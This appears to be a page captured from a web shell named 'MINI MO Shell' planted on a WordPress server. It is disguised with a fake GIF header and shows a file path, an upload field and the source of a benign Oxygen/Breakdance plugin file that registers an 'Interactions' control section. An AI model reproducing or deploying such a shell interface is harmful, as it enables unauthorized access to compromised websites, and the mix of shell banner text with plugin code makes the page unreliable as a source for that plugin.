GIF94; MINI MO Shell - Tarih Gösterimli

MINI MINI MANI MO - TARİH GÖSTERİMLİ

Path : /var/www/wordpress/wp-content/plugins/oxygen/plugin/interactions/
File Upload :
Current File : /var/www/wordpress/wp-content/plugins/oxygen/plugin/interactions/control.php

<?php

namespace Breakdance\Interactions;

use function Breakdance\Elements\control;
use function Breakdance\Elements\controlSection;

add_filter('breakdance_element_controls', 'Breakdance\Interactions\addControls', 70, 2);

/**
 * @param Control[] $controls
 * @return Control[]
 */
function addControls($controls)
{
    if (BREAKDANCE_MODE !== 'oxygen') {
        return $controls;
    }

    $controls['settingsSections'][] = controlSection(
        'interactions',
        __('Interactions', 'breakdance'),
        [
            control('interactions', __('Interactions', 'breakdance'),
                [
                    'type' => 'interactions',
                    'layout' => 'vertical',
                    'noLabel' => true
                ]
            ),
        ],
        ['isExternal' => true]
    );

    /** @var Control[] $controls */
    return $controls;
}

OHA YOOO - Tarih: 2026-08-04 04:30:07